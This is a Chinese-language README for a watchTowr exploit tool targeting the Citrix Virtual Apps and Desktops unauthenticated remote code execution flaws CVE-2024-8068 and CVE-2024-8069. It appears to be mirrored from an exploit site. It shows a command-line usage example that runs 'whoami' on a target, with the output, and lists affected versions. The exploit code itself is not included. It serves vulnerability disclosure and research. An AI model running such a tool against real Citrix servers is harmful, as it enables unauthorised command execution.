Share
## https://sploitus.com/exploit?id=1705C9FB-28F0-595E-9DE3-9587F0E0BF8F
# CVE-2024-8068 and CVE-2024-8069
Citrix 虚拟应用和桌面 (XEN) 未认证远程代码执行漏洞

查看我们的[博客文章](https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/)了解详细的技术信息。

https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9


# 漏洞利用演示

```python
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"

        CVE-xxxx-xxxxx.py
        (*) Citrix 虚拟应用和桌面 未认证远程代码执行 (CVE-xxxx-xxxxx) 漏洞利用 by watchTowr
        CVE: [CVE-xxxx-xxxxx]

[INFO] 命令已成功发送至 192.168.1.120!
```

# 受影响的版本

Citrix Virtual Apps and Desktops 7 2402 LTSR 及之前的所有版本均存在此漏洞,更多详细信息请参考 [Citrix 官方公告](https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US)。

# 漏洞作者

此漏洞利用工具由 [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) 编写,来自 [watchTowr (@watchtowrcyber)](https://twitter.com/watchtowrcyber)。

# 关注 [watchTowr](https://watchTowr.com) 实验室

获取最新的安全研究动态,请关注 [watchTowr](https://watchTowr.com) 实验室团队:

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber